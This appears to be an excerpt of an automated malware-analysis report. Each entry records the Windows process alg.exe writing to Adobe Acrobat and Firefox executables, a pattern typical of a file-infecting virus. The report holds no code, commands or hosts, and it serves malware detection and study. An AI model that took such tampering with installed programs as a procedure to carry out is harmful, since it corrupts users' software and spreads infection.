Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe			Jump to behavior
